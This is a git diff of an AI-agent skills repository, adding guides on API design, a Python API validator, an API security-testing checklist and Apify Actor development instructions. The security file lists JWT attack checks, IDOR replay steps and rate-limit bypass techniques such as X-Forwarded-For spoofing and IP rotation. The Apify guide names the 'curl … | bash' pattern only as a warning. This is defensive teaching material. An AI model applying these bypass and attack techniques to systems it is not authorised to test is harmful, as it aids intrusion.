description: Master API documentation with OpenAPI 3.1, AI-powered tools, and modern developer experience practices. Create interactive docs, generate SDKs, and build comprehensive developer portals.
risk: unknown
source: community
date_added: '2026-02-27'
---
You are an expert API documentation specialist mastering modern developer experience through comprehensive, interactive, and AI-enhanced documentation.


@@ -1,11 +1,9 @@
---
name: api-fuzzing-bug-bounty
description: "This skill should be used when the user asks to \"test API security\", \"fuzz APIs\", \"find IDOR vulnerabilities\", \"test REST API\", \"test GraphQL\", \"API penetration testing\", \"bug b..."
metadata:
  author: zebbern
  version: "1.1"
risk: unknown
source: community
date_added: "2026-02-27"
---

# API Fuzzing for Bug Bounty

@@ -1,9 +1,9 @@
---
name: api-patterns
description: "API design principles and decision-making. REST vs GraphQL vs tRPC selection, response formats, versioning, pagination."
allowed-tools: Read, Write, Edit, Glob, Grep
risk: unknown
source: community
date_added: "2026-02-27"
---

# API Patterns

42
web-app/public/skills/api-patterns/api-style.md
Normal file
@@ -0,0 +1,42 @@
# API Style Selection (2025)

> REST vs GraphQL vs tRPC - which one fits which situation?

## Decision Tree

```
Who are the API consumers?
│
├── Public API / Multiple platforms
│   └── REST + OpenAPI (widest compatibility)
│
├── Complex data needs / Multiple frontends
│   └── GraphQL (flexible queries)
│
├── TypeScript frontend + backend (monorepo)
│   └── tRPC (end-to-end type safety)
│
├── Real-time / Event-driven
│   └── WebSocket + AsyncAPI
│
└── Internal microservices
    └── gRPC (performance) or REST (simplicity)
```

## Comparison

| Factor | REST | GraphQL | tRPC |
|--------|------|---------|------|
| **Best for** | Public APIs | Complex apps | TS monorepos |
| **Learning curve** | Low | Medium | Low (if TS) |
| **Over/under fetching** | Common | Solved | Solved |
| **Type safety** | Manual (OpenAPI) | Schema-based | Automatic |
| **Caching** | HTTP native | Complex | Client-based |

## Selection Questions

1. Who are the API consumers?
2. Is the frontend TypeScript?
3. How complex are the data relationships?
4. Is caching critical?
5. Public or internal API?

24
web-app/public/skills/api-patterns/auth.md
Normal file
@@ -0,0 +1,24 @@
# Authentication Patterns

> Choose auth pattern based on use case.

## Selection Guide

| Pattern | Best For |
|---------|----------|
| **JWT** | Stateless, microservices |
| **Session** | Traditional web, simple |
| **OAuth 2.0** | Third-party integration |
| **API Keys** | Server-to-server, public APIs |
| **Passkey** | Modern passwordless (2025+) |

## JWT Principles

```
Important:
├── Always verify signature
├── Check expiration
├── Include minimal claims
├── Use short expiry + refresh tokens
└── Never store sensitive data in JWT
```

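The first two JWT principles above (verify the signature, check expiration) can be sketched with the standard library alone; `mint_jwt` and `verify_jwt_hs256` are illustrative helpers for HS256 only, a teaching sketch rather than a substitute for a maintained JWT library.

```python
import base64
import hashlib
import hmac
import json
import time


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(part: str) -> bytes:
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def mint_jwt(claims: dict, secret: bytes) -> str:
    """Create an HS256-signed token (illustrative helper)."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = _b64url(json.dumps(claims).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def verify_jwt_hs256(token: str, secret: bytes) -> dict:
    """Verify signature and expiration, then return the claims."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    # Constant-time comparison prevents timing attacks on the signature
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("invalid signature")
    claims = json.loads(_b64url_decode(payload_b64))
    if claims.get("exp", 0) < time.time():
        raise ValueError("token expired")
    return claims
```

Note the sketch hard-codes the algorithm rather than trusting the token header, which is what defeats "alg: none" downgrade attacks.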
26
web-app/public/skills/api-patterns/documentation.md
Normal file
@@ -0,0 +1,26 @@
# API Documentation Principles

> Good docs = happy developers = API adoption.

## OpenAPI/Swagger Essentials

```
Include:
├── All endpoints with examples
├── Request/response schemas
├── Authentication requirements
├── Error response formats
└── Rate limiting info
```

## Good Documentation Has

```
Essentials:
├── Quick start / Getting started
├── Authentication guide
├── Complete API reference
├── Error handling guide
├── Code examples (multiple languages)
└── Changelog
```

41
web-app/public/skills/api-patterns/graphql.md
Normal file
@@ -0,0 +1,41 @@
# GraphQL Principles

> Flexible queries for complex, interconnected data.

## When to Use

```
✅ Good fit:
├── Complex, interconnected data
├── Multiple frontend platforms
├── Clients need flexible queries
├── Evolving data requirements
└── Reducing over-fetching matters

❌ Poor fit:
├── Simple CRUD operations
├── File upload heavy
├── HTTP caching important
└── Team unfamiliar with GraphQL
```

## Schema Design Principles

```
Principles:
├── Think in graphs, not endpoints
├── Design for evolvability (no versions)
├── Use connections for pagination
├── Be specific with types (not generic "data")
└── Handle nullability thoughtfully
```

## Security Considerations

```
Protect against:
├── Query depth attacks → Set max depth
├── Query complexity → Calculate cost
├── Batching abuse → Limit batch size
└── Introspection → Disable in production
```

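The max-depth defence above can be approximated with a brace-counting sketch; `query_depth` and `enforce_max_depth` are deliberately naive illustrations (they ignore braces inside string literals and comments), whereas a production server would walk the parsed query AST.

```python
def query_depth(query: str) -> int:
    """Approximate selection-set depth by tracking curly-brace nesting."""
    depth = max_depth = 0
    for ch in query:
        if ch == "{":
            depth += 1
            max_depth = max(max_depth, depth)
        elif ch == "}":
            depth -= 1
    return max_depth


def enforce_max_depth(query: str, limit: int = 5) -> None:
    """Reject queries nested deeper than `limit` before executing them."""
    d = query_depth(query)
    if d > limit:
        raise ValueError(f"query depth {d} exceeds limit {limit}")
```

Rejecting the query before resolver execution is what makes this a denial-of-service control: the cost is paid at parse time, not per-field.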
31
web-app/public/skills/api-patterns/rate-limiting.md
Normal file
@@ -0,0 +1,31 @@
# Rate Limiting Principles

> Protect your API from abuse and overload.

## Why Rate Limit

```
Protect against:
├── Brute force attacks
├── Resource exhaustion
├── Cost overruns (if pay-per-use)
└── Unfair usage
```

## Strategy Selection

| Type | How | When |
|------|-----|------|
| **Token bucket** | Burst allowed, refills over time | Most APIs |
| **Sliding window** | Smooth distribution | Strict limits |
| **Fixed window** | Simple counters per window | Basic needs |

## Response Headers

```
Include in headers:
├── X-RateLimit-Limit (max requests)
├── X-RateLimit-Remaining (requests left)
├── X-RateLimit-Reset (when limit resets)
└── Return 429 when exceeded
```

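The token-bucket strategy from the table can be sketched in a few lines; `TokenBucket` is an illustrative single-process implementation (a shared store such as Redis would be needed across instances), with the clock injected so behaviour is deterministic in tests.

```python
import time


class TokenBucket:
    """Allow bursts up to `capacity`; refill at `rate` tokens per second."""

    def __init__(self, capacity: float, rate: float, now=time.monotonic):
        self.capacity = capacity
        self.rate = rate
        self.tokens = capacity   # start full: bursts are allowed immediately
        self.now = now
        self.last = now()

    def allow(self) -> bool:
        t = self.now()
        # Refill proportionally to elapsed time, capped at capacity
        self.tokens = min(self.capacity, self.tokens + (t - self.last) * self.rate)
        self.last = t
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False  # caller should respond 429 with the headers above
```

The `X-RateLimit-Remaining` header would report `int(bucket.tokens)` after each allowed request.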
37
web-app/public/skills/api-patterns/response.md
Normal file
@@ -0,0 +1,37 @@
# Response Format Principles

> Consistency is key - choose a format and stick to it.

## Common Patterns

```
Choose one:
├── Envelope pattern ({ success, data, error })
├── Direct data (just return the resource)
└── HAL/JSON:API (hypermedia)
```

## Error Response

```
Include:
├── Error code (for programmatic handling)
├── User message (for display)
├── Details (for debugging, field-level errors)
├── Request ID (for support)
└── NOT internal details (security!)
```

## Pagination Types

| Type | Best For | Trade-offs |
|------|----------|------------|
| **Offset** | Simple, jumpable | Performance on large datasets |
| **Cursor** | Large datasets | Can't jump to page |
| **Keyset** | Performance critical | Requires sortable key |

### Selection Questions

1. How large is the dataset?
2. Do users need to jump to specific pages?
3. Is data frequently changing?

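The cursor/keyset rows in the table can be sketched as follows; `paginate` assumes rows sorted by an ascending `id` and uses an opaque base64 cursor, both illustrative choices rather than a fixed convention.

```python
import base64
import json


def encode_cursor(key) -> str:
    """Opaque cursor: clients cannot guess or tamper with offsets."""
    return base64.urlsafe_b64encode(json.dumps(key).encode()).decode()


def decode_cursor(cursor: str):
    return json.loads(base64.urlsafe_b64decode(cursor))


def paginate(rows, limit, cursor=None):
    """Keyset pagination over rows sorted by ascending 'id'."""
    last_id = decode_cursor(cursor) if cursor else None
    if last_id is not None:
        # In SQL this would be WHERE id > :last_id ORDER BY id LIMIT :limit
        rows = [r for r in rows if r["id"] > last_id]
    page = rows[:limit]
    next_cursor = encode_cursor(page[-1]["id"]) if len(rows) > limit else None
    return {"data": page, "next_cursor": next_cursor}
```

Because each page is anchored to the last seen key rather than a numeric offset, inserts and deletes between requests cannot shift or duplicate results.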
40
web-app/public/skills/api-patterns/rest.md
Normal file
@@ -0,0 +1,40 @@
# REST Principles

> Resource-based API design - nouns not verbs.

## Resource Naming Rules

```
Principles:
├── Use NOUNS, not verbs (resources, not actions)
├── Use PLURAL forms (/users not /user)
├── Use lowercase with hyphens (/user-profiles)
├── Nest for relationships (/users/123/posts)
└── Keep shallow (max 3 levels deep)
```

## HTTP Method Selection

| Method | Purpose | Idempotent? | Body? |
|--------|---------|-------------|-------|
| **GET** | Read resource(s) | Yes | No |
| **POST** | Create new resource | No | Yes |
| **PUT** | Replace entire resource | Yes | Yes |
| **PATCH** | Partial update | No | Yes |
| **DELETE** | Remove resource | Yes | No |

## Status Code Selection

| Situation | Code | Why |
|-----------|------|-----|
| Success (read) | 200 | Standard success |
| Created | 201 | New resource created |
| No content | 204 | Success, nothing to return |
| Bad request | 400 | Malformed request |
| Unauthorized | 401 | Missing/invalid auth |
| Forbidden | 403 | Valid auth, no permission |
| Not found | 404 | Resource doesn't exist |
| Conflict | 409 | State conflict (duplicate) |
| Validation error | 422 | Valid syntax, invalid data |
| Rate limited | 429 | Too many requests |
| Server error | 500 | Our fault |

211
web-app/public/skills/api-patterns/scripts/api_validator.py
Normal file
@@ -0,0 +1,211 @@
#!/usr/bin/env python3
"""
API Validator - Checks API endpoints for best practices.
Validates OpenAPI specs, response formats, and common issues.
"""
import sys
import json
import re
from pathlib import Path

# Fix Windows console encoding for Unicode output
try:
    sys.stdout.reconfigure(encoding='utf-8', errors='replace')
    sys.stderr.reconfigure(encoding='utf-8', errors='replace')
except AttributeError:
    pass  # Python < 3.7


def find_api_files(project_path: Path) -> list:
    """Find API-related files."""
    patterns = [
        "**/*api*.ts", "**/*api*.js", "**/*api*.py",
        "**/routes/*.ts", "**/routes/*.js", "**/routes/*.py",
        "**/controllers/*.ts", "**/controllers/*.js",
        "**/endpoints/*.ts", "**/endpoints/*.py",
        "**/*.openapi.json", "**/*.openapi.yaml",
        "**/swagger.json", "**/swagger.yaml",
        "**/openapi.json", "**/openapi.yaml"
    ]

    files = []
    for pattern in patterns:
        files.extend(project_path.glob(pattern))

    # Exclude node_modules, etc.
    return [f for f in files if not any(x in str(f) for x in ['node_modules', '.git', 'dist', 'build', '__pycache__'])]


def check_openapi_spec(file_path: Path) -> dict:
    """Check OpenAPI/Swagger specification."""
    issues = []
    passed = []

    try:
        content = file_path.read_text(encoding='utf-8')

        if file_path.suffix == '.json':
            spec = json.loads(content)
        else:
            # Basic YAML check
            if 'openapi:' in content or 'swagger:' in content:
                passed.append("[OK] OpenAPI/Swagger version defined")
            else:
                issues.append("[X] No OpenAPI version found")

            if 'paths:' in content:
                passed.append("[OK] Paths section exists")
            else:
                issues.append("[X] No paths defined")

            if 'components:' in content or 'definitions:' in content:
                passed.append("[OK] Schema components defined")

            return {'file': str(file_path), 'passed': passed, 'issues': issues, 'type': 'openapi'}

        # JSON OpenAPI checks
        if 'openapi' in spec or 'swagger' in spec:
            passed.append("[OK] OpenAPI version defined")

        if 'info' in spec:
            if 'title' in spec['info']:
                passed.append("[OK] API title defined")
            if 'version' in spec['info']:
                passed.append("[OK] API version defined")
            if 'description' not in spec['info']:
                issues.append("[!] API description missing")

        if 'paths' in spec:
            path_count = len(spec['paths'])
            passed.append(f"[OK] {path_count} endpoints defined")

            # Check each path
            for path, methods in spec['paths'].items():
                for method, details in methods.items():
                    if method in ['get', 'post', 'put', 'patch', 'delete']:
                        if 'responses' not in details:
                            issues.append(f"[X] {method.upper()} {path}: No responses defined")
                        if 'summary' not in details and 'description' not in details:
                            issues.append(f"[!] {method.upper()} {path}: No description")

    except Exception as e:
        issues.append(f"[X] Parse error: {e}")

    return {'file': str(file_path), 'passed': passed, 'issues': issues, 'type': 'openapi'}


def check_api_code(file_path: Path) -> dict:
    """Check API code for common issues."""
    issues = []
    passed = []

    try:
        content = file_path.read_text(encoding='utf-8')

        # Check for error handling
        error_patterns = [
            r'try\s*{', r'try:', r'\.catch\(',
            r'except\s+', r'catch\s*\('
        ]
        has_error_handling = any(re.search(p, content) for p in error_patterns)
        if has_error_handling:
            passed.append("[OK] Error handling present")
        else:
            issues.append("[X] No error handling found")

        # Check for status codes
        status_patterns = [
            r'status\s*\(\s*\d{3}\s*\)', r'statusCode\s*[=:]\s*\d{3}',
            r'HttpStatus\.', r'status_code\s*=\s*\d{3}',
            r'\.status\(\d{3}\)', r'res\.status\('
        ]
        has_status = any(re.search(p, content) for p in status_patterns)
        if has_status:
            passed.append("[OK] HTTP status codes used")
        else:
            issues.append("[!] No explicit HTTP status codes")

        # Check for validation
        validation_patterns = [
            r'validate', r'schema', r'zod', r'joi', r'yup',
            r'pydantic', r'@Body\(', r'@Query\('
        ]
        has_validation = any(re.search(p, content, re.I) for p in validation_patterns)
        if has_validation:
            passed.append("[OK] Input validation present")
        else:
            issues.append("[!] No input validation detected")

        # Check for auth middleware
        auth_patterns = [
            r'auth', r'jwt', r'bearer', r'token',
            r'middleware', r'guard', r'@Authenticated'
        ]
        has_auth = any(re.search(p, content, re.I) for p in auth_patterns)
        if has_auth:
            passed.append("[OK] Authentication/authorization detected")

        # Check for rate limiting
        rate_patterns = [r'rateLimit', r'throttle', r'rate.?limit']
        has_rate = any(re.search(p, content, re.I) for p in rate_patterns)
        if has_rate:
            passed.append("[OK] Rate limiting present")

        # Check for logging
        log_patterns = [r'console\.log', r'logger\.', r'logging\.', r'log\.']
        has_logging = any(re.search(p, content) for p in log_patterns)
        if has_logging:
            passed.append("[OK] Logging present")

    except Exception as e:
        issues.append(f"[X] Read error: {e}")

    return {'file': str(file_path), 'passed': passed, 'issues': issues, 'type': 'code'}


def main():
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    project_path = Path(target)

    print("\n" + "=" * 60)
    print(" API VALIDATOR - Endpoint Best Practices Check")
    print("=" * 60 + "\n")

    api_files = find_api_files(project_path)

    if not api_files:
        print("[!] No API files found.")
        print(" Looking for: routes/, controllers/, api/, openapi.json/yaml")
        sys.exit(0)

    results = []
    for file_path in api_files[:15]:  # Limit
        if 'openapi' in file_path.name.lower() or 'swagger' in file_path.name.lower():
            result = check_openapi_spec(file_path)
        else:
            result = check_api_code(file_path)
        results.append(result)

    # Print results
    total_issues = 0
    total_passed = 0

    for result in results:
        print(f"\n[FILE] {result['file']} [{result['type']}]")
        for item in result['passed']:
            print(f" {item}")
            total_passed += 1
        for item in result['issues']:
            print(f" {item}")
            if item.startswith("[X]"):
                total_issues += 1

    print("\n" + "=" * 60)
    print(f"[RESULTS] {total_passed} passed, {total_issues} critical issues")
    print("=" * 60)

    if total_issues == 0:
        print("[OK] API validation passed")
        sys.exit(0)
    else:
        print("[X] Fix critical issues before deployment")
        sys.exit(1)


if __name__ == "__main__":
    main()

122
web-app/public/skills/api-patterns/security-testing.md
Normal file
@@ -0,0 +1,122 @@
# API Security Testing

> Principles for testing API security. OWASP API Top 10, authentication, authorization testing.

---

## OWASP API Security Top 10

| Vulnerability | Test Focus |
|---------------|------------|
| **API1: BOLA** | Access other users' resources |
| **API2: Broken Auth** | JWT, session, credentials |
| **API3: Property Auth** | Mass assignment, data exposure |
| **API4: Resource Consumption** | Rate limiting, DoS |
| **API5: Function Auth** | Admin endpoints, role bypass |
| **API6: Business Flow** | Logic abuse, automation |
| **API7: SSRF** | Internal network access |
| **API8: Misconfiguration** | Debug endpoints, CORS |
| **API9: Inventory** | Shadow APIs, old versions |
| **API10: Unsafe Consumption** | Third-party API trust |

---

## Authentication Testing

### JWT Testing

| Check | What to Test |
|-------|--------------|
| Algorithm | None, algorithm confusion |
| Secret | Weak secrets, brute force |
| Claims | Expiration, issuer, audience |
| Signature | Manipulation, key injection |

### Session Testing

| Check | What to Test |
|-------|--------------|
| Generation | Predictability |
| Storage | Client-side security |
| Expiration | Timeout enforcement |
| Invalidation | Logout effectiveness |

---

## Authorization Testing

| Test Type | Approach |
|-----------|----------|
| **Horizontal** | Access peer users' data |
| **Vertical** | Access higher privilege functions |
| **Context** | Access outside allowed scope |

### BOLA/IDOR Testing

1. Identify resource IDs in requests
2. Capture request with user A's session
3. Replay with user B's session
4. Check for unauthorized access

---

## Input Validation Testing

| Injection Type | Test Focus |
|----------------|------------|
| SQL | Query manipulation |
| NoSQL | Document queries |
| Command | System commands |
| LDAP | Directory queries |

**Approach:** Test all parameters, try type coercion, test boundaries, check error messages.

---

## Rate Limiting Testing

| Aspect | Check |
|--------|-------|
| Existence | Is there any limit? |
| Bypass | Headers, IP rotation |
| Scope | Per-user, per-IP, global |

**Bypass techniques:** X-Forwarded-For, different HTTP methods, case variations, API versioning.

---

## GraphQL Security

| Test | Focus |
|------|-------|
| Introspection | Schema disclosure |
| Batching | Query DoS |
| Nesting | Depth-based DoS |
| Authorization | Field-level access |

---

## Security Testing Checklist

**Authentication:**
- [ ] Test for bypass
- [ ] Check credential strength
- [ ] Verify token security

**Authorization:**
- [ ] Test BOLA/IDOR
- [ ] Check privilege escalation
- [ ] Verify function access

**Input:**
- [ ] Test all parameters
- [ ] Check for injection

**Config:**
- [ ] Check CORS
- [ ] Verify headers
- [ ] Test error handling

---

> **Remember:** APIs are the backbone of modern apps. Test them like attackers will.

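The BOLA/IDOR replay steps above can be expressed as a small harness; `check_bola` and the injected `fetch` callable are hypothetical names, kept transport-agnostic so the replay logic can be exercised without a live target (in practice `fetch` would wrap an HTTP client).

```python
def check_bola(fetch, url_template, resource_ids, session_a, session_b):
    """Replay user A's resource requests with user B's session.

    `fetch(url, session)` is an injected callable returning an HTTP
    status code. A resource is flagged when both sessions get 200:
    A confirms the resource exists, B should have been denied.
    """
    findings = []
    for rid in resource_ids:
        url = url_template.format(id=rid)
        if fetch(url, session_a) == 200 and fetch(url, session_b) == 200:
            findings.append(url)  # B can read A's resource: possible BOLA/IDOR
    return findings
```

Confirming with session A first filters out 404s, so every finding is a real object that the second session should not have been able to read.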
41
web-app/public/skills/api-patterns/trpc.md
Normal file
@@ -0,0 +1,41 @@
# tRPC Principles

> End-to-end type safety for TypeScript monorepos.

## When to Use

```
✅ Perfect fit:
├── TypeScript on both ends
├── Monorepo structure
├── Internal tools
├── Rapid development
└── Type safety critical

❌ Poor fit:
├── Non-TypeScript clients
├── Public API
├── Need REST conventions
└── Multiple language backends
```

## Key Benefits

```
Why tRPC:
├── Zero schema maintenance
├── End-to-end type inference
├── IDE autocomplete across stack
├── Instant API changes reflected
└── No code generation step
```

## Integration Patterns

```
Common setups:
├── Next.js + tRPC (most common)
├── Monorepo with shared types
├── Remix + tRPC
└── Any TS frontend + backend
```

22
web-app/public/skills/api-patterns/versioning.md
Normal file
@@ -0,0 +1,22 @@
# Versioning Strategies

> Plan for API evolution from day one.

## Decision Factors

| Strategy | Implementation | Trade-offs |
|----------|---------------|------------|
| **URI** | /v1/users | Clear, easy caching |
| **Header** | Accept-Version: 1 | Cleaner URLs, harder discovery |
| **Query** | ?version=1 | Easy to add, messy |
| **None** | Evolve carefully | Best for internal, risky for public |

## Versioning Philosophy

```
Consider:
├── Public API? → Version in URI
├── Internal only? → May not need versioning
├── GraphQL? → Typically no versions (evolve schema)
└── tRPC? → Types enforce compatibility
```

@@ -3,6 +3,7 @@ name: api-security-best-practices
description: "Implement secure API design patterns including authentication, authorization, input validation, rate limiting, and protection against common API vulnerabilities"
risk: unknown
source: community
date_added: "2026-02-27"
---

# API Security Best Practices

@@ -1,11 +1,10 @@
---
name: api-security-testing
description: "API security testing workflow for REST and GraphQL APIs covering authentication, authorization, rate limiting, input validation, and security best practices."
source: personal
risk: safe
domain: security
category: granular-workflow-bundle
version: 1.0.0
risk: safe
source: personal
date_added: "2026-02-27"
---

# API Security Testing Workflow

@@ -3,6 +3,7 @@ name: api-testing-observability-api-mock
description: "You are an API mocking expert specializing in realistic mock services for development, testing, and demos. Design mocks that simulate real API behavior and enable parallel development."
risk: unknown
source: community
date_added: "2026-02-27"
---

# API Mocking Framework

File diff suppressed because it is too large
218
web-app/public/skills/apify-actor-development/SKILL.md
Normal file
218
web-app/public/skills/apify-actor-development/SKILL.md
Normal file
@@ -0,0 +1,218 @@
|
||||
---
|
||||
name: apify-actor-development
|
||||
description: "Develop, debug, and deploy Apify Actors - serverless cloud programs for web scraping, automation, and data processing. Use when creating new Actors, modifying existing ones, or troubleshooting Acto..."
|
||||
---
|
||||
|
||||
# Apify Actor Development
|
||||
|
||||
**Important:** Before you begin, fill in the `generatedBy` property in the meta section of `.actor/actor.json`. Replace it with the tool and model you're currently using, such as "Claude Code with Claude Sonnet 4.5". This helps Apify monitor and improve AGENTS.md for specific AI tools and models.
|
||||
|
||||
## What are Apify Actors?
|
||||
|
||||
Actors are serverless programs inspired by the UNIX philosophy - programs that do one thing well and can be easily combined to build complex systems. They're packaged as Docker images and run in isolated containers in the cloud.
|
||||
|
||||
**Core Concepts:**
|
||||
- Accept well-defined JSON input
|
||||
- Perform isolated tasks (web scraping, automation, data processing)
|
||||
- Produce structured JSON output to datasets and/or store data in key-value stores
|
||||
- Can run from seconds to hours or even indefinitely
|
||||
- Persist state and can be restarted
|
||||
|
||||
## Prerequisites & Setup (MANDATORY)
|
||||
|
||||
Before creating or modifying actors, verify that `apify` CLI is installed `apify --help`.
|
||||
|
||||
If it is not installed, use one of these methods (listed in order of preference):
|
||||
|
||||
```bash
|
||||
# Preferred: install via a package manager (provides integrity checks)
|
||||
npm install -g apify-cli
|
||||
|
||||
# Or (Mac): brew install apify-cli
|
||||
```
|
||||
|
||||
> **Security note:** Do NOT install the CLI by piping remote scripts to a shell
|
||||
> (e.g. `curl … | bash` or `irm … | iex`). Always use a package manager.
|
||||
|
||||
When the apify CLI is installed, check that it is logged in with:
|
||||
|
||||
```bash
|
||||
apify info # Should return your username
|
||||
```
|
||||
|
||||
If it is not logged in, check if the `APIFY_TOKEN` environment variable is defined (if not, ask the user to generate one on https://console.apify.com/settings/integrations and then define `APIFY_TOKEN` with it).
|
||||
|
||||
Then authenticate using one of these methods:
|
||||
|
||||
```bash
|
||||
# Option 1 (preferred): The CLI automatically reads APIFY_TOKEN from the environment.
|
||||
# Just ensure the env var is exported and run any apify command — no explicit login needed.
|
||||
|
||||
# Option 2: Interactive login (prompts for token without exposing it in shell history)
|
||||
apify login
|
||||
```
|
||||
|
||||
> **Security note:** Avoid passing tokens as command-line arguments (e.g. `apify login -t <token>`).
|
||||
> Arguments are visible in process listings and may be recorded in shell history.
|
||||
> Prefer environment variables or interactive login instead.
|
||||
> Never log, print, or embed `APIFY_TOKEN` in source code or configuration files.
|
||||
> Use a token with the minimum required permissions (scoped token) and rotate it periodically.
|
||||
|
||||
## Template Selection
|
||||
|
||||
**IMPORTANT:** Before starting actor development, always ask the user which programming language they prefer:
|
||||
- **JavaScript** - Use `apify create <actor-name> -t project_empty`
|
||||
- **TypeScript** - Use `apify create <actor-name> -t ts_empty`
|
||||
- **Python** - Use `apify create <actor-name> -t python-empty`
|
||||
|
||||
Use the appropriate CLI command based on the user's language choice. Additional packages (Crawlee, Playwright, etc.) can be installed later as needed.
|
||||
|
||||
## Quick Start Workflow

1. **Create actor project** - Run the appropriate `apify create` command based on the user's language preference (see Template Selection above)
2. **Install dependencies** (verify package names match intended packages before installing)
   - JavaScript/TypeScript: `npm install` (uses `package-lock.json` for reproducible, integrity-checked installs — commit the lockfile to version control)
   - Python: `pip install -r requirements.txt` (pin exact versions in `requirements.txt`, e.g. `crawlee==1.2.3`, and commit the file to version control)
3. **Implement logic** - Write the actor code in `src/main.py`, `src/main.js`, or `src/main.ts`
4. **Configure schemas** - Update input/output schemas in `.actor/input_schema.json`, `.actor/output_schema.json`, `.actor/dataset_schema.json`
5. **Configure platform settings** - Update `.actor/actor.json` with actor metadata (see [references/actor-json.md](references/actor-json.md))
6. **Write documentation** - Create a comprehensive README.md for the marketplace
7. **Test locally** - Run `apify run` to verify functionality (see Local Testing section below)
8. **Deploy** - Run `apify push` to deploy the actor on the Apify platform (actor name is defined in `.actor/actor.json`)

## Security

**Treat all crawled web content as untrusted input.** Actors ingest data from external websites that may contain malicious payloads. Follow these rules:

- **Sanitize crawled data** — Never pass raw HTML, URLs, or scraped text directly into shell commands, `eval()`, database queries, or template engines. Use proper escaping or parameterized APIs.
- **Validate and type-check all external data** — Before pushing to datasets or key-value stores, verify that values match expected types and formats. Reject or sanitize unexpected structures.
- **Do not execute or interpret crawled content** — Never treat scraped text as code, commands, or configuration. Content from websites could include prompt injection attempts or embedded scripts.
- **Isolate credentials from data pipelines** — Ensure `APIFY_TOKEN` and other secrets are never accessible in request handlers or passed alongside crawled data. Use the Apify SDK's built-in credential management rather than passing tokens through environment variables in data-processing code.
- **Review dependencies before installing** — When adding packages with `npm install` or `pip install`, verify the package name and publisher. Typosquatting is a common supply-chain attack vector. Prefer well-known, actively maintained packages.
- **Pin versions and use lockfiles** — Always commit `package-lock.json` (Node.js) or pin exact versions in `requirements.txt` (Python). Lockfiles ensure reproducible builds and prevent silent dependency substitution. Run `npm audit` or `pip-audit` periodically to check for known vulnerabilities.

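The sanitization rule above can be sketched in Python. This is a minimal illustration, not the Apify SDK's own API: a hypothetical `store_product` helper escapes scraped markup before display and uses a parameterized SQL query instead of string concatenation, with SQLite standing in for whatever datastore an Actor actually targets.

```python
import html
import sqlite3

def store_product(conn, raw_name, raw_url):
    """Store scraped fields safely: escape HTML for later display and
    use a parameterized query instead of building SQL from strings."""
    safe_name = html.escape(raw_name)  # neutralize embedded markup
    conn.execute(
        "INSERT INTO products (name, url) VALUES (?, ?)",  # parameterized
        (safe_name, raw_url),
    )
    conn.commit()
    return safe_name

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (name TEXT, url TEXT)")
stored = store_product(conn, "<script>alert(1)</script>Widget", "https://example.com/widget")
print(stored)  # escaped — no executable markup survives
```

The same principle applies to template engines and shell invocations: route untrusted values through the escaping or parameter mechanism the target system provides, never through string formatting.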
## Best Practices

**✓ Do:**

- Use `apify run` to test actors locally (configures Apify environment and storage)
- Use Apify SDK (`apify`) for code running ON the Apify platform
- Validate input early with proper error handling and fail gracefully
- Use CheerioCrawler for static HTML (10x faster than browsers)
- Use PlaywrightCrawler only for JavaScript-heavy sites
- Use the router pattern (createCheerioRouter/createPlaywrightRouter) for complex crawls
- Implement retry strategies with exponential backoff
- Use proper concurrency: HTTP (10-50), Browser (1-5)
- Set sensible defaults in `.actor/input_schema.json`
- Define output schema in `.actor/output_schema.json`
- Clean and validate data before pushing to dataset
- Use semantic CSS selectors with fallback strategies
- Respect robots.txt, ToS, and implement rate limiting
- **Always use `apify/log` package** — censors sensitive data (API keys, tokens, credentials)
- Implement readiness probe handler (required if your Actor uses standby mode)

**✗ Don't:**

- Use `npm start`, `npm run start`, `npx apify run`, or similar commands to run actors (use `apify run` instead)
- Assume local storage from `apify run` is pushed to or visible in the Apify Console — it is local-only; deploy with `apify push` and run on the platform to see results in the Console
- Rely on `Dataset.getInfo()` for final counts on Cloud
- Use browser crawlers when HTTP/Cheerio works
- Hardcode values that should be in the input schema or environment variables
- Skip input validation or error handling
- Overload servers - use appropriate concurrency and delays
- Scrape prohibited content or ignore Terms of Service
- Store personal/sensitive data unless explicitly permitted
- Use deprecated options like `requestHandlerTimeoutMillis` on CheerioCrawler (v3.x)
- Use `additionalHttpHeaders` - use `preNavigationHooks` instead
- Pass raw crawled content into shell commands, `eval()`, or code-generation functions
- Use `console.log()` or `print()` instead of the Apify logger — these bypass credential censoring
- Disable standby mode without explicit permission

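The "retry strategies with exponential backoff" guidance above can be sketched as a small helper. This is a hypothetical `retry_with_backoff` function, not an SDK API — Crawlee's crawlers have their own built-in retry handling; the injected `sleep` parameter exists only so the demo runs instantly.

```python
import random
import time

def retry_with_backoff(fn, max_attempts=4, base_delay=0.1, sleep=time.sleep):
    """Retry fn with exponentially growing delay plus jitter;
    re-raise the error after the final attempt."""
    for attempt in range(max_attempts):
        try:
            return fn()
        except Exception:
            if attempt == max_attempts - 1:
                raise
            # 0.1s, 0.2s, 0.4s, ... plus random jitter to avoid thundering herd
            delay = base_delay * (2 ** attempt) + random.uniform(0, base_delay)
            sleep(delay)

calls = {"n": 0}
def flaky():
    calls["n"] += 1
    if calls["n"] < 3:
        raise ConnectionError("transient failure")
    return "ok"

result = retry_with_backoff(flaky, sleep=lambda d: None)  # skip real sleeping in the demo
print(result)  # succeeds on the third attempt
```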
## Logging

See [references/logging.md](references/logging.md) for complete logging documentation, including available log levels and best practices for JavaScript/TypeScript and Python.

For standby mode, check `usesStandbyMode` in `.actor/actor.json` — implement the readiness probe only if it is set to `true`.

## Commands

```bash
apify run     # Run Actor locally
apify login   # Authenticate account
apify push    # Deploy to Apify platform (uses name from .actor/actor.json)
apify help    # List all commands
```

**IMPORTANT:** Always use `apify run` to test actors locally. Do not use `npm run start`, `npm start`, `yarn start`, or other package manager commands - these will not properly configure the Apify environment and storage.

## Local Testing

When testing an actor locally with `apify run`, provide input data by creating a JSON file at:

```
